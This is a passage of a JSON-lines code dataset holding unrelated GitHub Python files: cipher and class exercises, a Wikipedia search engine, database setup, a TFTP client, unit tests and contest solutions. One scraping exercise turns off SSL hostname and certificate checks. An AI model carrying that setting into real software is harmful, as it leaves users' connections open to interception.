(position + char_shift) % 26\n translation = alphabet[0 + char_shift]\n else:\n translation = alphabet[position + char_shift]\n\n if is_upper:\n final_text += translation.upper()\n else:\n final_text += translation\n else:\n position = alphabet.index(character)\n if position - char_shift < 0:\n char_shift = (char_shift - position) % 26\n translation = alphabet[26 - char_shift]\n else:\n translation = alphabet[position - char_shift]\n\n if is_upper:\n final_text += translation.upper()\n else:\n final_text += translation\n\n if choice == \"E\":\n print(\"Your encoded message is:\")\n print(final_text)\n else:\n print(\"Your decoded message is:\")\n print(final_text)\n\n game_on = input(\"Would you like to try another message? [Y] or [N]: \\n\")\n if game_on == \"N\":\n continue_game = False\n\n os.system('clear')\n\n\ngamestart()\ncipher()\n","repo_name":"rlane728/100DaysOfPython","sub_path":"Day08/Caesar_Cipher.py","file_name":"Caesar_Cipher.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70511511556","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"Escriba una función es_bisiesto() que determine si un año determinado es un año bisiesto. \nUn año bisiesto es divisible por 4, pero no por 100. También es divisible por 400.\ndef es_bisiesto(year):\n return year % 4 == 0 and ( year % 100 != 0 or year % 400 == 0)\n\"\"\"\n\n\"\"\"\nEscribe un programa que pida dos palabras y diga si riman o no. Si coinciden las tres últimas letras tiene que \n# decir que riman. Si coinciden sólo las dos últimas tiene que decir que riman un poco y si no, que no riman.\n\"\"\"\n\ndef son_rimas(palabra_1, palabra_2):\n ultimas_3_palabra_1 = palabra_1[-3:]\n ultimas_3_palabra_2 = palabra_2[-3:]\n ultimas_2_palabra_1 = palabra_1[-2:]\n ultimas_2_palabra_2 = palabra_2[-2:]\n\n\n if ultimas_3_palabra_1 == ultimas_3_palabra_2:\n print(\"Riman\")\n elif ultimas_2_palabra_1 == ultimas_2_palabra_2:\n print(\"Riman un poco\")\n else:\n print(\"No riman\")\n\ndef validar_palabra():\n valido = True\n while valido == True:\n palabra_1 = input(\"Ingrese una palabra: \")\n if len(palabra_1) > 3:\n valido = False\n return palabra_1 \n\npalabra_1 = validar_palabra()\npalabra_2 = validar_palabra()\n\nson_rimas(palabra_1, palabra_2)\n\n\n\"\"\"\nEscribe una función llamada \"elimina_duplicados\"\nque elimine los elementos duplicados en una lista y los devuelva en una nueva lista.\n\"\"\"","repo_name":"parivgabriela/tec_sup_ciencia_datos_ia","sub_path":"tec_programacion/ejercicios_clase/clase05-30.py","file_name":"clase05-30.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1295594363","text":"import sys\nimport os\nimport glob\nimport re\nimport time\nimport numpy as np\nimport heapq\n\nfrom nltk.corpus import stopwords\nimport Stemmer\n\nfrom index import DOC_BLOCK_SIZE\n\nNUM_RESULTS = [100, 10]\nTOT_DOCS = 50000000\n\n# For storing docs and tfs, given query\nclass QDoc():\n def __init__(self, doc_id, is_field_query, num_words=-1):\n self.doc_id = doc_id\n self.is_field_query = is_field_query\n self.terms = []\n # Term format { 'token', 'tf', 'fields', 'posting_list_size' }\n self.num_words = num_words\n \n # Add a query word in the document\n def addQuerryWord(self, token, tf, fields, pl_size):\n term = [token, tf, fields, pl_size]\n self.terms.append(term)\n \n # Calculate the TF-IDF score for the document\n def calculateScore(self, field_weights):\n score = 0\n # print(self.terms)\n for term in self.terms:\n pl_size = term[3]\n idf = np.log(TOT_DOCS/pl_size)\n fields = term[2]\n \n # Add Body frequency\n tf = 0\n if self.is_field_query:\n if 'b' in fields:\n tf = int(term[1])\n else:\n tf = int(term[1])\n \n # Add frequency for other fields (t, i, c, l, r)\n for field in fields:\n field = field+':'\n tf += field_weights[field]\n # For the 100 docs, divide tf by num_words\n # (to improve the relevance by penalizing long docs)\n if self.num_words != -1:\n tf /= self.num_words\n\n score += idf * tf\n \n score = np.log(score)\n return score\n\nclass QueryParser():\n def __init__(self, argv):\n # Location of the query file\n self.query_file = argv[0]\n \n # Directory path for the index files\n self.index_path = './index/'\n # Directory path for the doc-title files\n self.doc_path = './doc/'\n # Directory for secondary index\n self.sec_dir = './secondary/'\n # Filename for secondary file index\n self.sec_file_path = os.path.join(self.sec_dir, 'secondary.txt')\n \n # Query results file\n self.query_results_file = os.path.join('./queries_op.txt')\n if os.path.exists(self.query_results_file):\n os.remove(self.query_results_file)\n \n # stemmer\n self.stemmer = Stemmer.Stemmer('english')\n # stopwords\n self.stopwords = set(stopwords.words('english'))\n\n self.fields = ['t:','b:','i:','c:','l:','r:']\n\n self.field_weights = {\n 't:': 100,\n 'b:': 1,\n 'i:': 40,\n 'c:': 40,\n 'l:': 10,\n 'r:': 10\n }\n\n # REGEX\n self.categories_regex = re.compile(r\"\\[\\[category:(.*)\\]\\]\")\n self.external_regex = re.compile(r\"=+external links=+\")\n self.infobox_regex = re.compile(r\"{{infobox((.|\\n)*)}}\\n\")\n self.links_regex = re.compile(r\"(https?://\\S+)\")\n self.references_regex = re.compile(r\"\\{\\{cite(.*?)\\}\\}\")\n self.token_regex = re.compile(r\"[^a-z0-9]+\")\n self.field_regex = re.compile(r\"([tbiclr]:)\")\n self.ignore_regex = [\n # Alphanumeric\n re.compile(\n r\"\\b((\\w*[0-9]\\w*)(\\w*[a-z]\\w*))|((\\w*[a-z]\\w*)(\\w*[0-9]\\w*))\\b\"),\n # Numbers <= 3 digits\n re.compile(r\"\\b[0-9]{1,3}\\b\"),\n # Numbers 4 digits, greater than 2022, less than 1000\n re.compile(r\"\\b(?:0(?:[0-9]{3})|20[3-9][0-9]|202[3-9]|[3-9][0-9]{3})\\b\"),\n # Numbers >= 5 digits\n re.compile(r\"\\b[0-9]{5,}\\b\"),\n # Letters = 1 char\n re.compile(r\"\\b[a-z]{1}\\b\"),\n # Letters >= 15 chars\n re.compile(r\"\\b[a-z]{15,}\\b\")\n ]\n\n self.is_field_query = False\n self.doc_count = 0\n self.docs = []\n self.doc_titles = []\n self.pl = {}\n\n # Parse Queries in the query file\n def parse_queries(self):\n self.queries = []\n with open(self.query_file, 'r') as f:\n queries = f.readlines()\n for query in queries:\n self.queries.append(query[:-1].lower())\n\n # Remove stopwords and/or perform stemming\n def tokenizer(self, text, remove_stopwords=True, do_stemming=True):\n text = set(text)\n\n if remove_stopwords is True:\n text = text - self.stopwords\n \n tokens = []\n for tok in text:\n if do_stemming is not True:\n tokens.append(tok)\n continue\n elif self.links_regex.match(tok):\n tokens.append(tok)\n continue\n\n # Cleaning\n # token = str(self.lemmatizer.lemmatize(tok))\n token = str(self.stemmer.stemWord(tok))\n to_continue=False\n for ig in self.ignore_regex:\n if ig.match(token):\n to_continue=True\n if to_continue is True:\n continue\n tokens.append(token)\n\n return tokens\n\n # Retrieve the index file name from secondary index\n def getIndexFileName(self, token_list):\n n = len(token_list)\n tokens_found = 0\n with open(self.sec_file_path, 'r') as f:\n line = f.readline()\n prev_filename, prev_token = line[:-1].split(';')\n line = f.readline()\n if line == '':\n for tok in token_list:\n token_list[tok] = prev_filename\n tokens_found = n\n else:\n while line != '' and tokens_found < n:\n cur_filename, cur_token = line[:-1].split(';')\n for tok in token_list:\n if prev_token<=tok and cur_token>tok and token_list[tok]=='':\n token_list[tok] = prev_filename\n tokens_found += 1\n prev_filename, prev_token = cur_filename, cur_token\n line = f.readline()\n for tok in token_list:\n if token_list[tok]=='':\n tokens_found += 1\n token_list[tok] = prev_filename\n \n return token_list\n\n # Find the set of documents in posting list\n # and their corresponding term freq.\n def findDocumentSet(self):\n self.doc_set = set()\n self.doc_id_set = set()\n for tok, pl in self.pl.items():\n terms = pl.split(';')\n pl_size = len(terms[1:])\n for term in terms[1:]:\n doc_id, tf, fields = term.split(':')\n if self.is_field_query is True:\n fields = self.token_queries[tok]\n if doc_id in self.doc_id_set:\n doc = next(filter(lambda x: x.doc_id == doc_id, self.doc_set))\n doc.addQuerryWord(tok, tf, fields, pl_size)\n else:\n doc = QDoc(doc_id, self.is_field_query)\n doc.addQuerryWord(tok, tf, fields, pl_size)\n self.doc_set.add(doc)\n self.doc_id_set.add(doc_id)\n\n def addWordCount(self):\n # Reduce the set of documents to the top NUM_RESULTS[0] = 100\n top_doc_set = set()\n for doc_id in self.docs:\n doc = next(filter(lambda x: x.doc_id == doc_id, self.doc_set))\n top_doc_set.add(doc)\n self.doc_set = top_doc_set\n \n # Now retrieve the num_words for each doc\n itr = 0\n while itr < len(self.docs):\n doc_id = self.docs[itr]\n doc_file = self.findDocFile(doc_id)\n doc_file_name = os.path.join(self.doc_path, doc_file)\n curr_doc_file = doc_file\n\n with open(doc_file_name, 'r') as f:\n line = f.readline()\n while line != '':\n terms = line[:-1].split(';')\n id = terms[0]\n if id == doc_id:\n doc = next(filter(lambda x: x.doc_id == doc_id, self.doc_set))\n wc = int(terms[1])\n doc.num_words = wc\n\n # Get info of next doc\n itr += 1\n if itr >= len(self.docs):\n break\n # Break if need to read diff. file (self.docs is sorted)\n doc_id = self.docs[itr]\n doc_file = self.findDocFile(doc_id)\n doc_file_name = os.path.join(self.doc_path, doc_file)\n if doc_file != curr_doc_file:\n break\n \n line = f.readline()\n \n if itr >= len(self.docs):\n break\n\n # Retrieve NUM_RESULTS[level=>0/1] most relevant documents\n # based in their score\n def ranker(self, level):\n heap = []\n self.docs = []\n for doc in self.doc_set:\n score = doc.calculateScore(self.field_weights)\n heap.append([score, doc.doc_id])\n heapq._heapify_max(heap)\n \n # Get the top NUM_RESULTS[level] results\n while len(heap)>0 and len(self.docs) query field\n self.token_queries = {}\n # Stores the index file name of each token\n token_list = {}\n for key in format_data:\n if len(format_data[key]) != 0:\n toks = self.tokenizer(format_data[key])\n for tok in toks:\n token_list[tok] = ''\n if tok in self.token_queries:\n self.token_queries[tok]+=key\n else:\n self.token_queries[tok] = key\n \n # Retrieve the Index File Name\n index_file_map = self.getIndexFileName(token_list)\n # print(index_file_map)\n \n else:\n format_data = set()\n for tok in self.token_regex.split(query):\n if tok != '':\n format_data.add(tok)\n tokens = self.tokenizer(format_data)\n \n # Stores the index file name of each token\n token_list = {}\n for tok in tokens:\n token_list[tok] = ''\n index_file_map = self.getIndexFileName(token_list)\n # print(index_file_map)\n\n # Store set of index files to be opened\n # for retrieving the posting_list/word\n index_files = set()\n for tok, file in index_file_map.items():\n index_files.add(file)\n # print(index_files)\n\n # Store which tokens to look for in each index file\n tok_in_index = {}\n for tok, file in index_file_map.items():\n if file in tok_in_index:\n tok_in_index[file].append(tok)\n else:\n tok_in_index[file] = [tok]\n # print(tok_in_index)\n\n # Retrieve the posting list for each token\n for i_file in index_files:\n filepath = self.index_path + i_file\n with open(filepath, 'r') as f:\n line = f.readline()\n while line != '':\n tok = line[:-1].split(';')[0]\n if tok in tok_in_index[i_file]:\n self.pl[tok] = line[:-1]\n line = f.readline()\n # print(self.pl)\n\n # Get the set of documents given the posting list\n self.findDocumentSet()\n\n # Score the documents\n self.ranker(0)\n self.addWordCount()\n self.ranker(1)\n\n # Find the titles for the documents\n self.findDocTitles()\n print(self.doc_titles, '\\n')\n\n end_time = time.time()\n with open(self.query_results_file, 'a') as f:\n for doc in self.doc_titles:\n string = ', '.join(doc)\n f.write(str(string)+'\\n')\n Δt = end_time-start_time\n f.write(str(Δt)+'\\n')\n f.write('\\n')\n\nif __name__ == \"__main__\":\n query_handler = QueryParser(argv=sys.argv[1:])\n query_handler.parse_queries()\n query_handler.run()\n","repo_name":"utkarsh-ls/Wikipedia-Search-Engine","sub_path":"phase1/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":15168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36150139557","text":"def hasher(key, length) -> int:\n if type(key).__name__ == 'int':\n if key < 0:\n key %= length\n key <<= 2 \n bin_key = bin(key)[2:]\n hash_value = sum(list(map(lambda x: (int(x)<<1) + 1, bin_key)))\n return hash_value % length \n elif type(key).__name__ == 'float':\n return (int(key) + hasher(str(key - int(key))[2:], length)) % length\n elif type(key).__name__ == 'str':\n return sum(list(map(lambda x: hasher(ord(x), length), list(key)))) % length\n elif type(key).__name__ == 'list':\n return sum(list(map(lambda x: hasher(x, length), key))) % length\n else: \n print('Unfortunately, type: {} impossible to process by hasher'.format(type(key).__name__))\n\n\ndef rehasher(old_hash, length) -> int:\n return (old_hash + 1) % length\n","repo_name":"NickLuman/HW_DB","sub_path":"Hash/hash_functions.py","file_name":"hash_functions.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15887986253","text":"import functools\nimport logging\nimport sys\n\nimport orjson\nimport psycopg2\nimport sqlalchemy.exc\nimport sqlalchemy.orm\nimport tenacity\nfrom sqlalchemy import create_engine\n\nfrom .config import Config\n\nengine = None\nsession_maker = sqlalchemy.orm.sessionmaker()\n\n# Module-global sqlalchemy session object, do not re-use in other modules.\n# This is for DB interaction that happens outside of HTTP request processing\n# context.\n_session = sqlalchemy.orm.scoped_session(session_maker)\n\n\nlog = logging.getLogger(__name__)\n\n\nlog.info(\"psycopg2.__libpq_version__: %s\", psycopg2.__libpq_version__)\n\n\n# Pick less log verbosity when\nlogfunc = log.info\nif \"pytest\" in sys.modules:\n logfunc = log.debug\n\n\ndef configure_engine(url):\n global engine, session_maker\n\n logfunc(\"create sqlalchemy DB engine\")\n engine = create_engine(\n url,\n echo=False,\n pool_pre_ping=True,\n # As of today some requests take a (too) long while to generate a\n # response for. We want to improve that fundamentally over time. Until\n # then, it of course makes sense to deliver a response even if it takes\n # a while. Sometimes, the response generation duration is dominated by\n # a database query which takes a long time until it returns. We have\n # seen the libpq statement timeout to hit in every now and then when it\n # was set to 30 seconds. Setting it to 120 seconds increases the\n # likelihood to deliver an HTTP response at all. Increasing it beyond\n # 180 s probably does not make sense if we don't also increase timeout\n # constants for the HTTP reverse proxy(s) in front of Conbench. See\n # conbench/gunicorn-conf.py. Related tickets and discussions:\n # https://github.com/conbench/conbench/issues/599\n # https://github.com/conbench/conbench/pull/690\n # https://docs.sqlalchemy.org/en/20/core/engines.html#use-the-connect-args-dictionary-parameter\n connect_args={\n \"options\": \"-c timezone=utc -c statement_timeout=120s\",\n # The `connect_timeout` parameter is documented in\n # https://www.postgresql.org/docs/12/libpq-connect.html\n \"connect_timeout\": 3, # unit: seconds\n },\n # This uses orjson for JSON-parsing JSONB fields from the database.\n # Anecdotal scenario seen with profiling: when loading 50000 result\n # objects from DB: psycopg2/_json.py:159 typecast_json took 2.5 s in\n # total (invoking stdblib JSONDecoder.decode 300000 times), with orjson\n # it took 0.3 s in total. No further noticeable gain with cysimdjson's\n # parser.\n json_deserializer=orjson.loads, # pylint: disable=E1101\n )\n logfunc(\"bind engine to session\")\n session_maker.configure(bind=engine)\n\n\n# compute this only once.\n@functools.cache\ndef get_tables_in_cleanup_order():\n # We need to remove rows from the many-to-many tables first to avoid\n # foreign key violations.\n\n from .entities._entity import Base as delarative_base\n\n tables = delarative_base.metadata.sorted_tables\n\n sort_by_name = [\"benchmark_result\"]\n\n tabledict = {t.name: t for t in tables}\n sorted_tables = []\n for name in sort_by_name:\n # find table with that name, destructure `tabledict`. Assume that\n # `sort_by_name` only contains known table names.\n sorted_tables.append(tabledict.pop(name))\n\n unsorted_tables = list(tabledict.values())\n\n # Stich both lists together.\n return sorted_tables + unsorted_tables\n\n\ndef empty_db_tables():\n \"\"\"\n For speeding up the test suite.\n\n Make sure that all tables are empty. A drop_all()/create_all() is a little\n slower than deleting individual table contents, especially when not using\n an in-memory database, as of the file system operations.\n \"\"\"\n if not Config.TESTING:\n log.warning(\"empty_db_tables() called in non-testing mode, skip\")\n return\n\n tables = get_tables_in_cleanup_order()\n\n for table in tables:\n _session.execute(table.delete())\n log.debug(\"deleted table: %s\", table)\n\n _session.commit()\n log.debug(\"all deletions committed: %s\", table)\n\n\ndef log_after_retry_attempt(retry_state: tenacity.RetryCallState):\n log.info(\n \"result after attempt %s for %s: %s\",\n retry_state.attempt_number,\n str(retry_state.fn),\n str(retry_state.outcome.exception()), # type: ignore[union-attr]\n )\n\n\n# `create_all()` below can fail with an `OperationalError` when the database\n# isn't yet reachable. Can happen when web app and database are launched at\n# about the same time (likely to happen only in dev environment). Apply a\n# retrying strategy.\n@tenacity.retry(\n retry=tenacity.retry_if_exception_type(sqlalchemy.exc.OperationalError),\n stop=tenacity.stop_after_attempt(50),\n wait=tenacity.wait_fixed(1),\n before=tenacity.before_log(log, logging.DEBUG),\n after=log_after_retry_attempt,\n reraise=True,\n)\ndef create_all():\n from .entities._entity import Base\n\n # Gunicorn without --preload runs create_all() in potentially multiple\n # runners. That's fine, and only one of them can 'win' the DB creation\n # prize.\n try:\n Base.metadata.create_all(engine)\n except (sqlalchemy.exc.IntegrityError, sqlalchemy.exc.ProgrammingError) as exc:\n # Seen in the wild:\n # sqlalchemy.exc.ProgrammingError: (psycopg2.errors.DuplicateTable) relation \"user\" already exists\n if \"already exists\" in str(exc):\n log.info(\n \"db.create_all(): ignore exception with 'already exists' in msg. \"\n \"Probably concurrent create_all() execution. Err: %s\",\n str(exc),\n )\n else:\n raise\n\n logfunc(\"create_all(engine) returned. dispose()\")\n engine.dispose()\n\n\ndef drop_all():\n from .entities._entity import Base\n\n _session.close()\n Base.metadata.drop_all(engine)\n","repo_name":"conbench/conbench","sub_path":"conbench/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"61"} +{"seq_id":"32535624217","text":"t = int(input())\nfor z in range(t):\n n,p = map(int, input().split())\n d =list(map(int,input().split()))\n vals = {}\n div = [0]*n\n flag = 0\n for i in range(n):\n if i==n-1:\n if(p%d[n-1]!=0):\n flag=1\n else:\n for j in range(i+1,n):\n if((d[j]%d[i] != 0) or (p % d[i] != 0)):\n flag = 1\n if(flag == 0):\n print(\"NO\")\n continue\n else:\n for i in range(n-1,-1,-1):\n if((p % d[i]) == 0):\n div[i] = (p // d[i]) - 1\n p = p - (div[i] * d[i])\n else:\n div[i] = (p // d[i]) + 1;\n break;\n print(\"YES\",end=' ')\n for i in div:\n print(i,end=' ')\n print()\n","repo_name":"darshanbangera/aps-2020","sub_path":"Code Library/codechef/nochange.py","file_name":"nochange.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9247866449","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport ssl\nimport re\ncount = dict()\nsum = 0\n\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter - ')\nhtml = urlopen(url, context=ctx).read()\nsoup = BeautifulSoup(html, \"html.parser\")\n\n#retrieve all anchor tags\ntags = soup('span')\nfor tag in tags:\n count[tag] = count.get(tag, 0) + 1\n lines = ('Contents:', tag.contents[0])\n num = list(lines)\n y = int(num[1])\n if y > 0:\n sum = sum + y\nprint(\"count\", count)\nprint(\"sum\", sum)\n\n","repo_name":"Alishba-Bacha/Python_For_EveryBody","sub_path":"Assignment_12.1/Assignment_12.1_code.py","file_name":"Assignment_12.1_code.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13079663913","text":"import struct\nfrom socket import *\n\nipAddr = '192.168.31.12'\ndownFileName = '123456.jpg'\n\nmyRequest = struct.pack('!H10sb5sb', 1, '123456.jpg'.encode('gb2312'), 0, 'octet'.encode('gb2312'), 0) # 组包\nudpSocket = socket(AF_INET, SOCK_DGRAM)\n# udpSocket.bind(('', 7878))\nudpSocket.sendto(myRequest, (ipAddr, 69))\nnewFile = open('123456.jpg'.encode('gb2312'), 'wb')\nwhile True:\n recvfromData = udpSocket.recvfrom(1024)\n recvData,serverInfo = recvfromData # (操作号,块编码),(服务器ip,端口)\n CZnum = struct.unpack('!H', recvData[:2]) # 操作号\n moduleNum = struct.unpack('!H', recvData[2:4]) # 块编码\n if CZnum[0] == 3:\n newFile.write(recvData[4:])\n ackData = struct.pack('!HH', 4, moduleNum[0])\n udpSocket.sendto(ackData, serverInfo)\n if len(recvData) < 516:\n break\nnewFile.close()\nudpSocket.close()\n","repo_name":"1655490577/StudyCodes","sub_path":"OldProject/历史文件/test/tftpfile.py","file_name":"tftpfile.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"378463139","text":"class Cat:\n def __init__(self, name, color='흰색'):\n self.name = name\n self.color = color\n\n def meow(self):\n print(f'내이름은 {self.name}, 색깔은 {self.color}, 야옹 야옹')\n\n\nnabi = Cat(\"나비\",\"흰섹\")\nnabi.meow()\nnero = Cat(\"네로\",\"검은색\")\nnero.meow()\nmimi = Cat(\"미미\",\"갈색\")\nmimi.meow()","repo_name":"minjung7961/python_lecture","sub_path":"Object/init_cats.py","file_name":"init_cats.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2354760276","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n# @TIME :2019/4/30 18:19\n# @Author : 洪松\n# @File : example7_16.py\n\nimport time\nfrom example7_15 import clock\n\n\n@clock\ndef snooze(seconds):\n time.sleep(seconds)\n\n\n@clock\ndef factorial(n):\n return 1 if n < 2 else n*factorial(n-1)\n\n\nif __name__ == '__main__':\n print('*' * 40, 'Calling snooze(.123)')\n snooze(.123)\n print('*' * 40, 'Calling factorial(6)')\n print('6! =', factorial(6))\n","repo_name":"hsyy673150343/FluentPython","sub_path":"函数装饰器和闭包/example7_16.py","file_name":"example7_16.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23450203081","text":"f_in = 'A-large.in'\nf_out = 'A-large.out'\n\nf = open(f_in, 'r')\no = open(f_out, 'w')\n\nT = int(f.readline())\n\ndef main():\n with f:\n data = f.readlines()\n\n total_standing = 0\n for case_num_minus1, line in enumerate(data):\n case = line.split()\n case[0] = int(case[0]) # Maximum shyness in audience\n case[1] = [int(i) for i in case[1]] # Data: S_i of audience\n\n min_friend_needed = 0\n for Si, num_of_Si_audience in enumerate(case[1]):\n if (Si == 0) and (num_of_Si_audience > 0):\n \"\"\" Base case \"\"\"\n total_standing = num_of_Si_audience\n elif (total_standing < Si):\n min_friend_needed += 1\n total_standing += (1+num_of_Si_audience)\n else:\n total_standing += num_of_Si_audience\n\n o.write(\"Case #{0}: {1}\\n\".format(str(case_num_minus1 + 1), str(min_friend_needed)))\n total_standing = 0 # Reset (loop logic bug?)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1820.py","file_name":"1820.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33638935729","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\ngraph = [[] for _ in range(n+1)]\r\n\r\nfor _ in range(m):\r\n a, b = map(int, input().split())\r\n graph[a].append(b)\r\n graph[b].append(a)\r\n\r\nvisited_sum = []\r\nfor i in range(1, n+1):\r\n visited = [0] * (n + 1)\r\n d1 = deque()\r\n d1.append(i)\r\n visited[i] = 1\r\n\r\n while True:\r\n if not d1:\r\n break\r\n\r\n tmp = d1.popleft()\r\n\r\n for j in graph[tmp]:\r\n if not visited[j]:\r\n visited[j] = visited[tmp] + 1\r\n d1.append(j)\r\n visited_sum.append(sum(visited))\r\nprint(visited_sum.index(min(visited_sum)) + 1)\r\n\r\n","repo_name":"tfer2442/myAlgorithm","sub_path":"백준/Silver/1389. 케빈 베이컨의 6단계 법칙/케빈 베이컨의 6단계 법칙.py","file_name":"케빈 베이컨의 6단계 법칙.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23635651681","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n\nclass SpeakingInTongues(object):\n \n SAMPLES = [\n (\"ejp mysljylc kd kxveddknmc re jsicpdrysi\",\n \"our language is impossible to understand\"),\n (\"rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd\",\n \"there are twenty six factorial possibilities\"),\n (\"de kr kd eoya kw aej tysr re ujdr lkgc jv\",\n \"so it is okay if you want to just give up\")\n ]\n\n def __init__(self):\n self.map = {\"z\": \"q\", \"q\": \"z\"}\n for s1, s2 in self.SAMPLES:\n for i in xrange(len(s1)):\n if s1[i] in self.map:\n assert(self.map[s1[i]] == s2[i])\n self.map[s1[i]] = s2[i] \n\n def sol(self, text):\n return \"\".join(map(lambda c: self.map[c], text))\n\ndef test_cases(input):\n fi = open(input, \"r\")\n T = int(fi.next())\n for i in xrange(1, T + 1):\n yield i, fi.next().strip()\n fi.close()\n\ndef main(input, output):\n fo = open(output, \"w\")\n problem = SpeakingInTongues()\n for i, text in test_cases(input):\n result = problem.sol(text)\n fo.write(\"Case #{0}: {1}\\n\".format(i, result)) \n fo.close()\n \nif __name__ == \"__main__\":\n # Parse command options\n from optparse import OptionParser\n parser = OptionParser(usage=\"Usage: %prog [options] param1 param2\") \n parser.add_option(\"-i\", \"--input\", dest=\"input\", help=\"Input file\")\n parser.add_option(\"-o\", \"--output\", dest=\"output\", help=\"Output file\")\n options, args = parser.parse_args()\n main(options.input, options.output)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_95/517.py","file_name":"517.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71221401154","text":"import unittest\n\nfrom src.room import Room\nfrom src.song import Song\nfrom src.guest import Guest\n\nclass TestRoom(unittest.TestCase):\n def setUp(self):\n self.empty_room = Room(0, 0, 0, [])\n self.room1 = Room(3, 5, 15, [])\n self.playlist1 = [\n Song(\"My Immortal\", \"Evanescence\"),\n Song(\"I Cant Dance\", \"Genesis\"),\n Song(\"Icky Thump\", \"The White Stripes\"),\n Song(\"Howlin For You\", \"The Black Keys\"),\n Song(\"Galvanize\", \"Chemical Brothers\"),\n Song(\"Breaking The Habit\", \"Linkin Park\"),\n Song(\"Legendary\", \" Welshly Arms\"),\n Song(\"Stone Cold Classics\", \"AKA George\"),\n Song(\"Back To Black\", \"Amy Winehouse\")\n ]\n self.guests = [\n Guest(\"Sheldon\", 80, \"At Last\"),\n Guest(\"Amy\", 90, \"On The Beach\"),\n Guest(\"Leonard\", 90, \"Galvanize\")\n ]\n\n def test_room_has_number(self):\n self.assertEqual(3, self.room1.number)\n \n def test_room_has_capacity(self):\n self.assertEqual(5, self.room1.capacity)\n \n def test_room_has_entry_fee(self):\n self.assertEqual(15, self.room1.entry_fee)\n \n def test_open_room(self):\n self.empty_room.open_room(3, 5 , 15, self.playlist1)\n self.assertEqual(self.room1.number, self.empty_room.number)\n self.assertEqual(self.room1.capacity, self.empty_room.capacity)\n self.assertEqual(self.room1.entry_fee, self.empty_room.entry_fee)\n self.assertEqual(self.playlist1, self.empty_room.playlist)\n \n def test_check_availability_true(self):\n self.assertEqual(True, self.room1.check_availability(self.room1, 3))\n \n \n def test_check_availability_false(self):\n self.assertEqual(False, self.empty_room.check_availability(self.empty_room, 3))\n self.assertEqual(False, self.room1.check_availability(self.room1, 6))\n \n def test_check_in(self):\n self.room1.check_in(self.room1 ,self.guests)\n self.assertEqual(2, self.room1.capacity)\n self.assertEqual(65, self.guests[0].wallet)\n self.assertEqual(75, self.guests[2].wallet)\n \n def test_check_out(self):\n self.room1.check_out(self.room1, self.guests)\n self.assertEqual(8, self.room1.capacity)\n \n def test_check_in_and_out(self):\n self.room1.check_in(self.room1, self.guests)\n self.assertEqual(2, self.room1.capacity)\n self.room1.check_out(self.room1, self.guests)\n self.assertEqual(5, self.room1.capacity)\n \n def test_take_payment(self):\n self.room1.take_payment(self.room1, self.guests)\n self.assertEqual(65, self.guests[0].wallet)\n self.assertEqual(75, self.guests[2].wallet)\n \n def test_guest_fav_song(self):\n self.room1.open_room(3, 5 , 15, self.playlist1)\n self.room1.check_in(self.room1 ,self.guests)\n self.assertEqual(True, self.room1.guest_fav_song(self.room1, self.guests))\n self.assertEqual(\"Whoo!\", self.room1.check_in(self.room1, self.guests))\n \n ","repo_name":"Cetins/karaoke_bar","sub_path":"tests/room_test.py","file_name":"room_test.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29081769193","text":"from flask import Flask\nfrom flask.json import jsonify\n\ndef getContactLists(cursor, userID):\n table = cursor.execute(\"SELECT * FROM contact_lists WHERE user_id=%s\", (str(userID)))\n contactLists = []\n for entry in table:\n count = 0\n contacts = cursor.execute(\"SELECT * FROM contact_lists WHERE contact_list_id=%s\", (str(entry[0])))\n for contact in contacts:\n count = count + 1\n contactLists.append({\"id\": entry[0], \"name\": entry[2], \"count\": count}) #return contact id, name, and contacts\n return contactLists\n\n\n\"\"\"\nAdds a contact list to the database. The contact list will be registered under a specific user through userID, and have a name which is contactListName\n\"\"\"\ndef addContactList(cursor, userID, contactListName):\n contact_lists = cursor.execute(\"SELECT * FROM contact_lists WHERE contact_list_name=%s\", 